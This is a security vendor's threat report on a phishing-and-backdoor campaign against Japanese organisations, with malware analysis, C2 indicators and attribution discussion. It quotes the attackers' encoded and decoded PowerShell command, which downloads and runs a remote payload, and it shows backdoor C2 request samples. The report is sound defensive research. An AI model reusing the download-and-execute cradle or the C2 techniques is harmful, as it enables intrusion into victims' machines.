In an effort to expose a common problem we see happening in the industry, Cylance® would like to shed some light on just how easy it is to fake attribution. The key factor we should focus on, as an industry, is determining HOW an attacker can take down an organization, rather than focusing only on the WHO.

Once we can identify how the attack happened, we can focus on what’s really important – prevention.

Background

While investigating some of the smaller name servers that APT28/Sofacy routinely use to host their infrastructure, Cylance discovered another prolonged campaign that appeared to exclusively target Japanese companies and individuals that began around August 2016. The later registration style was eerily close to previously registered APT28 domains, however, the malware used in the attacks did not seem to line up at all. During the course of our investigation, JPCERT published this analysis of one of the group’s backdoors. Cylance tracks this threat group internally as ‘Snake Wine’.

We found the infrastructure to be significantly larger than documented at the link above. Cylance believes some of the steps taken by the attacker could possibly be an attempt at a larger disinformation campaign based upon some of the older infrastructure that would link it to a well-known CN-APT group. Nearly all of the initial data in this case was gathered from delving further into the domains hosted by ’It Itch.’ South Korea’s National Intelligence Service (NIS) previously leveraged It Itch’s services, as documented by Citizen Lab in this post. A number of the samples were signed using the leaked code-signing certificate from the Hacking Team breach.

Propagation and Targeting

To date, all observed attacks were the result of spear phishing attempts against the victim organizations. The latest batch used well-crafted LNK files contained within similarly named password-protected ZIP files. The LNK files, when opened, would execute a PowerShell command via ‘cmd.exe /c’ to download and execute an additional payload. The attackers appeared to prefer the Google URL shortening service ‘goog.gl,’ however, this could easily change as the attacks evolve.

powershell.exe -nop –w hidden -exec bypass -enc “JAAyAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGUAeABlAGMAIABiAHkAcABhAHMAcwAgAC0AYwAgACIASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwAHMAOgAvAC8AZwBvAG8ALgBnAGwALwBjAHAAVAAxAE4AVwAnACcAKQAiACcAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAMwAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJAAzACAAJAAyACIAOwB9AGUAbABzAGUAewBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkADIAIgA7AH0A

Figure 1: Encoded PowerShell Cmdlet Contained Within the LNK File

$2='-nop -w hidden -exec bypass -c "IEX (New-Object

System.Net.Webclient).DownloadString(''https://goo(dot)gl/cpT1NW'')"';if([IntPtr]::Size -eq 8){$3 =

$env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $3 $2";}else{iex "&

powershell $2";}

Figure 2: Decoded PowerShell Snippet

The shortened URL connected to 'hxxxp://koala (dot) acsocietyy (dot) com/acc/image/20170112001 (dot) jpg.' This file was in fact another piece of PowerShell code modified from ‘PowerSploit'. That file opens a decoy document and executes an approximately 60kb chunk of position independent shellcode. The shellcode upon further decoding and analysis is nearly identical to what Cylance calls ‘The Ham Backdoor’ below. This particular variant of the backdoor references itself internally as version ‘1.6.4’ and beaconed to ‘gavin (dot) ccfchrist (dot) com.’

The move to a shellcode-based backdoor was presumably done to decrease overall AV detection and enable deployment via a wider array of methods. A public report released here documented a similar case in which several universities were targeted by an email purporting to be from The Japanese Society for the Promotion of Science ‘jsps (dot) go (dot) jp’ regarding the need to renew grant funding. The website ‘koala (dot) asocietyy (dot) com’ was also used to host the following PowerShell payloads:

ae0dd5df608f581bbc075a88c48eedeb7ac566ff750e0a1baa7718379941db86 20170112003.jpg

75ef6ea0265d2629c920a6a1c0d1dd91d3c0eda86445c7d67ebb9b30e35a2a9f 20170112002.jpg

723983883fc336cb575875e4e3ff0f19bcf05a2250a44fb7c2395e564ad35d48 20170112007.jpg

3d5e3648653d74e2274bb531d1724a03c2c9941fdf14b8881143f0e34fe50f03 20170112005.jpg

471b7edbd3b344d3e9f18fe61535de6077ea9fd8aa694221529a2ff86b06e856 20170112.jpg

4ff6a97d06e2e843755be8697f3324be36e1ebeb280bb45724962ce4b6710297 20170112001.jpg

9fbd69da93fbe0e8f57df3161db0b932d01b6593da86222fabef2be31899156d 20170112006.jpg

f45b183ef9404166173185b75f2f49f26b2e44b8b81c7caf6b1fc430f373b50b 20170112008.jpg

646f837a9a5efbbdde474411bb48977bff37abfefaa4d04f9fb2a05a23c6d543 20170112004.jpg

The payloads contained within each PowerShell script beaconed to the same domain name, with the exception of ‘20170112008.jpg’, which beaconed to ‘hamiltion (dot) catholicmmb (dot) com.’

Earlier attempts used EXE’s disguised with Microsoft Word document icons and DOCX files within a similarly named ZIP file as documented by JPCERT. Cylance has observed the following ZIP files which contained a similarly named executable:

平成29年日米安保戦略対話提言(未定稿).zip

2016県立大学シンポジウムA4＿1025.zip

日米関係重要事項一覧表.zip

ロシア歴史協会の設立と「単一」国史教科書の作成.zip

日米拡大抑止協議.zip

個人番号の提供について.zip

11月新学而会.zip

Malware

The Ham Backdoor

The Ham Backdoor functions primarily as a modular platform, which provides the attacker with the ability to directly download additional modules and execute them in memory from the command and control (C2) server. The backdoor was programmed in C++ and compiled using Visual Studio 2015. The modules that Cylance has observed so far provided the ability to:

Upload specific files to the C2

Download a file to the infected machine

Load and execute a DLL payload

List running processes and services

Execute a shell command

Add an additional layer of AES encryption to the network protocol

Search for a keyword in files

Legacy AV appears to have fairly good coverage for most of the samples; however, minor changes in newer samples have considerably lower detection rates. JPCERT calls this backdoor ‘ChChes’ for cross-reference. The malware employs a number of techniques for obfuscation, such as stack construction of variables and data, various XOR encodings and data reordering schemes, and some anti-analysis techniques. Perhaps the most interesting of these, and the one we’ve chosen to key on from a detection perspective, is the following bit of assembly which was the final component in decoding a large encoded block of code:

lea edx, [esi+edi]

mov edi, [ebp+var_4]

mov cl, [ecx+edx]

xor cl, [eax+edi]

inc eax

mov edi, [ebp+arg_8]

mov [edx], cl

mov ecx, [ebp+arg_0]

cmp eax, ebx

This snippet in the analyzed samples used a fixed size XOR key usually 0x66 bytes long but would sequentially XOR every byte by each value of the key. This effectively results in a single byte XOR by the end of the operation. This operation made little sense in comparison to the other more complicated reordering and longer XOR encodings used prior to this mechanism. Cylance only found two variants to this code-block, however, that could be easily modified by the attacker in the future. The code also makes extensive use of the multi-byte NOP operation prefixed by 0x0F1F. These operations present somewhat of a problem for older disassemblers such as the original Ollydbg, but are trivially patched.

The network protocol of the backdoor is well described by JPCERT, but Cylance has taken the liberty to clean up their original python snippet, which was provided for decoding the cookie values:

import hashlib

from Crypto.Cipher import ARC4 def network_decode(cookie_data):

data_list = cookie_data.split (';')

dec = []

for i in range(len(data_list)):

tmp = data_list[i]

pos = tmp.find("=")

key = tmp[0:pos]

val = tmp[pos:]

md5 = hashlib.md5()

md5.update(key)

rc4key = md5.hexdigest()[8:24]

rc4 = ARC4.new(rc4key)

dec.append(rc4.decrypt(val.decode("base64"))[len(key):])

print ("[*] decoded:" + "" .join (dec))

Figure 3: Cleaned Script Originally by JPCERT

As noted in the JPCERT report, Cylance also found that in most cases of successful infection, one of the earliest modules downloaded onto the system added an additional layer of AES communication to the traffic. The backdoor would also issue anomalous HTTP requests with the method ‘ST’ in the event that the C2 server did not respond appropriately to the initial request.

An example request is shown below:

ST /2C/H.htm HTTP/1.1

Cookie: uQ=[REDACTED];omWwFSA=hw4biTXvqd%2FhK2TIyoLYj1%2FShw6MhEGHlWurHsUyekeuunmop4kZ;Tgnfm5E=RPBaxi%2Bf4B2r6CTd9jh5u3AHOwuyVaJeuw%3D%3D

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET

CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)

Host: kawasaki.unhamj(dot)com

Content-Length: 0

Connection: Keep-Alive

Cache-Control: no-cache

Figure 4: Example Request Using the ‘ST’ Method

The majority of the Ham Backdoors found to date have all been signed using the stolen and leaked Hacking Team code-signing certificate.

‘HT Srl’ Certificate Details:

Status: Revoked

Issuer: VeriSign Class 3 Code Signing 2010 CA

Valid: 1:00 AM 8/5/2011 to 12:59 AM 8/5/2012

Thumbprint: B366DBE8B3E81915CA5C5170C65DCAD8348B11F0

Serial Number: 3F FC EB A8 3F E0 0F EF 97 F6 3C D9 2E 77 EB B9

Why the attackers chose to use this expired certificate to sign their malware samples is unknown. The malware itself bears little resemblance to previous hacking team implants and was likely done purely as an attempt to throw off attribution. The only observed persistence method to date is the use of the standard Windows Run key ‘SOFTWARE\Microsoft\Windows\CurrentVersion\Run’ under either a user’s hive or HKLM. Cylance found that the following three full file paths were commonly used by this particular backdoor:

%AppData%\Reader.exe

%AppData%\Notron.exe

%AppData%\SCSI_Initiarot.exe

Cylance also identified an earlier sample, which took advantage of a self-extracting RAR and a side loading vulnerability in the legitimate Microsoft Resource Compiler, ‘RC.exe.’ RC.exe will load the DLL ‘RCDLL.dll’ via its import table. This modified DLL was responsible for XOR decoding and mapping the shellcode version of the Ham Backdoor. This particular sample was stored in a file called ‘RC.cfg’, which was encoded using a single byte XOR against the key of 0x54. It appears that this version was only used in early campaigns, as the latest referenced backdoor version Cylance identified was ‘v1.2.2.’

Tofu Backdoor

Based upon Cylance’s observations, the Tofu Backdoor was deployed in far fewer instances than the Ham Backdoor. It is a proxy-aware, fully-featured backdoor programmed in C++ and compiled using Visual Studio 2015. The Tofu backdoor makes extensive use of threading to perform individual tasks within the code. It communicates with its C2 server through HTTP over nonstandard TCP ports, and will send encoded information containing basic system information back, including hostname, username, and operating system within the content of the POST.

POST /586E32A1FFFFFFFF.aspx HTTP/1.1

Accept: */*

Cookies: Sym1.0: 0

,Sym2.0: 0

,Sym3.0: 61456

,Sym4.0: 1

Host: area.wthelpdesk.com:443

Content-Length: 39

Connection: Keep-Alive

Cache-Control: no-cache

Figure 5: Example POST Request From the Tofu Backdoor

Although communication took place on TCP port 443, none of the traffic was encrypted and the custom cookies ‘Sym1.0’ – ‘Sym4.0’ can be used to easily identify the backdoor in network traffic. The backdoor has the ability to enumerate processor, memory, drive, and volume information, execute commands directly from the attacker, enumerate and remove files and folders, and upload and download files. Commands were sent by the C2 and processed by the backdoor in the form of encoded DWORDs, each correspondeding to a particular action listed above. Tofu may also create two different bi-directional named pipes on the system ‘\\.\pipe\1[12345678]’ and ‘\\.\pipe\2[12345678]’ which could be accessed via other compromised machines on the internal network.

During an active investigation, the file was found at ‘%AppData%\iSCSI_Initiarot.exe’. This path was confirmed as a static location in the code that the backdoor would use to copy itself. A static Run key was also used by the backdoor to establish persistence on the victim machine (HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft iSCSI Initiator).



All of the samples Cylance identified were compiled in November 2016, so these backdoors may have simply been tests as later samples moved back to the shellcode-based Ham Backdoors. The backdoors were also similarly signed using the same stolen code-signing certificate from ‘HT Srl.’

C2 Infrastructure

Cylance found that at least half of the infrastructure associated with The Deception Project appeared to be dark or at least unused. This suggests that the Snake Wine group will likely continue to escalate their activity and persistently target both private and government entities within Japan.



Cylance also found an extensive network of Dynamic DNS (DDNS) domains registered via multiple free providers was likely being used by the same group. However, Cylance was unable to identify any current samples which communicated with this infrastructure, and have subsequently separated this activity from the rest of the attacker’s infrastructure. Many of the DDNS domains were concocted to mimic legitimate windows update domains such as ‘download.windowsupdate(dot)com’, ‘ipv4.windowsupdate(dot)com’, and ‘v4.windowsupdate(dot)com’.

Domain Registration Information:

8/19/16 wchildress(dot)com abellonav.poulsen(at)yandex.com

8/19/16 poulsenv(dot)com abellonav.poulsen(at)yandex.com

8/19/16 toshste(dot)com toshsteffensen2(at)yandex.com

9/6/16 shenajou(dot)com ShenaJouellette(at)india.com

9/6/16 ixrayeye(dot)com BettyWBatts(at)india.com

9/12/16 wthelpdesk(dot)com ArmandOValcala(at)india.com

9/12/16 bdoncloud(dot)com GloriaRPaige(at)india.com

9/12/16 belowto(dot)com RobertoRivera(at)india.com

11/3/16 incloud-go(dot)com RufinaRWebb(at)india.com

11/3/16 unhamj(dot)com JuanitaRDunham(at)india.com

11/3/16 cloud-maste(dot)com MeganFDelgado(at)india.com

11/4/16 cloud-kingl(dot)com ElisabethBGreen(at)india.com

11/4/16 incloud-obert(dot)com RobertJButler(at)india.com

12/6/16 fftpoor(dot)com SteveCBrown(at)india.com

12/6/16 ccfchrist(dot)com WenonaTMcMurray(at)india.com

12/7/16 catholicmmb(dot)com EmilyGLessard(at)india.com

12/7/16 usffunicef(dot)com MarisaKParr(at)india.com

12/7/16 cwiinatonal(dot)com RobertMKnight(at)india.com

12/7/16 tffghelth(dot)com NathanABecker(at)india.com

12/7/16 acsocietyy(dot)com PearlJBrown(at)india.com

12/8/16 tokyo-gojp(dot)com VeraTPerkins(at)india.com

12/8/16 salvaiona(dot)com DeborahAStutler(at)india.com

12/8/16 osaka-jpgo(dot)com JudithAMartel(at)india.com

12/8/16 tyoto-go-jp(dot)com AletaFNowak(at)india.com

12/8/16 fastmail2(dot)com ClementBCarico(at)india.com

12/11/16 wcwname(dot)com CynthiaRNickerson(at)india.com

12/12/16 dedgesuite(dot)net KatherineKTaggart(at)india.com

12/12/16 wdsupdates(dot)com GordonESlavin(at)india.com

12/12/16 nsatcdns(dot)com SarahNBosch(at)india.com

12/13/16 vscue(dot)com ChrisTDawkins(at)india.com

12/13/16 sindeali(dot)com DonnaJMcCray(at)india.com

12/13/16 vmmini(dot)com RaymondRKimbrell(at)india.com

12/20/16 u-tokyo-ac-jp(dot)com LynnJOwens(at)india.com

12/21/16 meiji-ac-jp(dot)com PearlJPoole(at)india.com

12/26/16 jica-go-jp(dot)bike AliceCLopez(at)india.com

12/27/16 mofa-go-jp(dot)com AngelaJBirkholz(at)india.com

12/27/16 jimin-jp(dot)biz EsmeraldaTYates(at)india.com

12/27/16 jica-go-jp(dot)biz RonaldSFreeman(at)india.com

2/9/17 jpcert(dot)org GinaKPiller(at)india.com

2/14/2017 ijica(dot)in DarrenMCrow(at)india.com

2/17/2017 chibashiri(dot)com WitaTBiles(at)india.com

2/17/2017 essashi(dot)com CarlosBPierson(at)india.com

2/17/2017 urearapetsu(dot)com IvoryDStallcup(at)india.com



Full Domain List:

area.wthelpdesk(dot)com

cdn.incloud-go(dot)com

center.shenajou(dot)com

commissioner.shenajou(dot)com

development.shenajou(dot)com

dick.ccfchrist(dot)com

document.shenajou(dot)com

download.windowsupdate.dedgesuite(dot)net

edgar.ccfchrist(dot)com

ewe.toshste(dot)com

fabian.ccfchrist(dot)com

flea.poulsenv(dot)com

foal.wchildress(dot)com

fukuoka.cloud-maste(dot)com

gavin.ccfchrist(dot)com

glicense.shenajou(dot)com

hamiltion.catholicmmb(dot)com

hukuoka.cloud-maste(dot)com

images.tyoto-go-jp(dot)com

interpreter.shenajou(dot)com

james.tffghelth(dot)com

kawasaki.cloud-maste(dot)com

kawasaki.unhamj(dot)com

kennedy.tffghelth(dot)com

lennon.fftpoor(dot)com

license.shenajou(dot)com

lion.wchildress(dot)com

lizard.poulsenv(dot)com

malcolm.fftpoor(dot)com

ms.ecc.u-tokyo-ac-jp(dot)com

msn.incloud-go(dot)com

sakai.unhamj(dot)com

sappore.cloud-maste(dot)com

sapporo.cloud-maste(dot)com

scorpion.poulsenv(dot)com

shrimp.bdoncloud(dot)com

sindeali(dot)com

style.u-tokyo-ac-jp(dot)com

trout.belowto(dot)com

ukuoka.cloud-maste(dot)com

v4.windowsupdate.dedgesuite(dot)net

vmmini(dot)com

whale.toshste(dot)com

windowsupdate.dedgesuite(dot)net

windowsupdate.wcwname(dot)com

www.cloud-maste(dot)com

www.foal.wchildress(dot)com

www.fukuoka.cloud-maste(dot)com

www.incloud-go(dot)com

www.kawasaki.cloud-maste(dot)com

www.kawasaki.unhamj(dot)com

www.lion.wchildress(dot)com

www.msn.incloud-go(dot)com

www.sakai.unhamj(dot)com

www.sapporo.cloud-maste(dot)com

www.unhamj(dot)com

www.ut-portal-u-tokyo-ac-jp.tyoto-go-jp(dot)com

www.vmmini(dot)com

www.wchildress(dot)com

www.yahoo.incloud-go(dot)com

yahoo.incloud-go(dot)com

zebra.bdoncloud(dot)com

zebra.incloud-go(dot)com

zebra.wthelpdesk(dot)com

IP Addresses:

107.181.160.109

109.237.108.202

151.101.100.73

151.236.20.16

158.255.208.170

158.255.208.189

158.255.208.61

160.202.163.79

160.202.163.82

160.202.163.90

160.202.163.91

169.239.128.143

185.117.88.81

185.133.40.63

185.141.25.33

211.110.17.209

31.184.198.23

31.184.198.38

92.242.144.2

Anomalous IP Crossover

One of the most perplexing aspects of tracing the infrastructure associated with this particular campaign is that it appeared to lead to a significant number of well-known ‘MenuPass’/ ‘Stone Panda’ domains. MenuPass is a well-documented CN-APT group, whose roots go back to 2009. The group was first publicly disclosed by FireEye in this report. However, many of those domains were inactive for as long as two years and could have easily been re-registered by another entity looking to obfuscate attribution.



As a result, we’ve only included recent Dynamic DNS domains that were connected to recently registered infrastructure. A much larger collection of information is available to trusted and interested parties. Please contact us at: deceptionproject (at) Cylance [dot] com.

Dynamic DNS IPs:

37.235.52.18 2016-05-11

78.153.151.222 2016-05-13

175.126.148.111 2016-07-14

95.183.52.57 2016-07-26

109.237.108.202 2016-12-26

109.248.222.85 2016-12-27

Dynamic DNS Domains:

blaaaaaaaaaaaa.windowsupdate(dot)3-a.net

contract.4mydomain(dot)com

contractus.qpoe(dot)com

ctdl.windowsupdate.itsaol(dot)com

ctldl.microsoftupdate.qhigh(dot)com

ctldl.windowsupdate.authorizeddns(dot)org

ctldl.windowsupdate.authorizeddns(dot)us

ctldl.windowsupdate.dnset(dot)com

ctldl.windowsupdate.lflinkup(dot)com

ctldl.windowsupdate.x24hr(dot)com

download.windowsupdate.authorizeddns(dot)org

download.windowsupdate.dnset(dot)com

download.windowsupdate.itsaol(dot)com

download.windowsupdate.lflinkup(dot)com

download.windowsupdate.x24hr(dot)com

ea.onmypc(dot)info

eu.wha(dot)la

feed.jungleheart(dot)com

fire.mrface(dot)com

fuck.ikwb(dot)com

globalnews.wikaba(dot)com

helpus.ddns(dot)info

home.trickip(dot)org

imap.dnset(dot)com

ipv4.windowsupdate.3-a(dot)net

ipv4.windowsupdate.authorizeddns(dot)org

ipv4.windowsupdate.dnset(dot)com

ipv4.windowsupdate.fartit(dot)com

ipv4.windowsupdate.lflink(dot)com

ipv4.windowsupdate.lflinkup(dot)com

ipv4.windowsupdate.mylftv(dot)com

ipv4.windowsupdate.x24hr(dot)com

latestnews.organiccrap(dot)com

microsoftmirror.mrbasic(dot)com

microsoftmusic.itemdb(dot)com

microsoftstore.onmypc(dot)net

microsoftupdate.qhigh(dot)com

mobile.2waky(dot)com

mseupdate.ourhobby(dot)com

newsreport.justdied(dot)com

nmrx.mrbonus(dot)com

outlook.otzo(dot)com

referred.gr8domain(dot)biz

twx.mynumber(dot)org

v4.windowsupdate.authorizeddns(dot)org

v4.windowsupdate.dnset(dot)com

v4.windowsupdate.itsaol(dot)com

v4.windowsupdate.lflinkup(dot)com

v4.windowsupdate.x24hr(dot)com

visualstudio.authorizeddns(dot)net

windowsupdate.2waky(dot)com

windowsupdate.3-a(dot)net

windowsupdate.acmetoy(dot)com

windowsupdate.authorizeddns(dot)net

windowsupdate.authorizeddns(dot)org

windowsupdate.dns05(dot)com

windowsupdate.dnset(dot)com

windowsupdate.esmtp(dot)biz

windowsupdate.ezua(dot)com

windowsupdate.fartit(dot)com

windowsupdate.itsaol(dot)com

windowsupdate.lflink(dot)com

windowsupdate.mrface(dot)com

windowsupdate.mylftv(dot)com

windowsupdate.x24hr(dot)com

www.contractus.qpoe(dot)com

www.feed.jungleheart(dot)com

www.helpus.ddns(dot)info

www.latestnews.organiccrap(dot)com

www.microsoftmirror.mrbasic(dot)com

www.microsoftmusic.itemdb(dot)com

www.microsoftstore.onmypc(dot)net

www.mobile.2waky(dot)com

www.mseupdate.ourhobby(dot)com

www.nmrx.mrbonus(dot)com

www.twx.mynumber(dot)org

www.visualstudio.authorizeddns(dot)net

www.windowsupdate.acmetoy(dot)com

www.windowsupdate.authorizeddns(dot)net

www.windowsupdate.authorizeddns(dot)org

www.windowsupdate.dnset(dot)com

www.windowsupdate.itsaol(dot)com

www.windowsupdate.x24hr(dot)com

www2.qpoe(dot)com

www2.zyns(dot)com

www2.zzux(dot)com

Conclusion

The Snake Wine group has proven to be highly adaptable and has continued to adopt new tactics in order to establish footholds inside victim environments. The exclusive interest in Japanese government, education, and commerce will likely continue into the future as the group is just starting to build and utilize their existing current attack infrastructure.



If the past is an accurate indicator, attacks will continue to escalate in both skill and intensity as the attackers implement new tactics in response to defenders acting on previously released information.

Perhaps the most interesting aspect of the Snake Wine group is the number of techniques used to obscure attribution. Signing the malware with a stolen and subsequently publicly leaked code-signing certificate is sloppy even for well-known CN-APT groups. Also of particular interest from an attribution obfuscation perspective is direct IP crossover with previous Dynamic DNS domains associated with known CN-APT activity. A direct trail was established over a period of years that would lead competent researchers to finger CN operators as responsible for this new activity as well.



Although the MenuPass Group used mostly publicly available RATs, they were successful in penetrating a number of high value targets, so it is entirely possible this is indeed a continuation of past activity. However, Cylance does not believe this scenario to be probable, as a significant amount of time has elapsed between the activity sets. Also of particular interest was the use of a domain hosting company that accepts BTC and was previously heavily leveraged by the well-known Russian group APT28.

In any case, Cylance hopes to better equip defenders to detect and respond to active threats within their network and enable the broader security community to respond to similar threats. In terms of defending and responding to malware, attribution is rarely important. As new methodologies become more broadly detected, threat actors will continue to embrace alternate and new strategies to continue achieving their objectives.

Yara Rules

Yara rules for this campaign can be found on GitHub here: https://github.com/CylanceSPEAR/IOCs/blob/master/snake.wine.yar



If you use our endpoint protection product, CylancePROTECT®, you were already protected from this attack. If you don't have CylancePROTECT, contact us to learn how our AI based solution can predict and prevent unknown and emerging threats.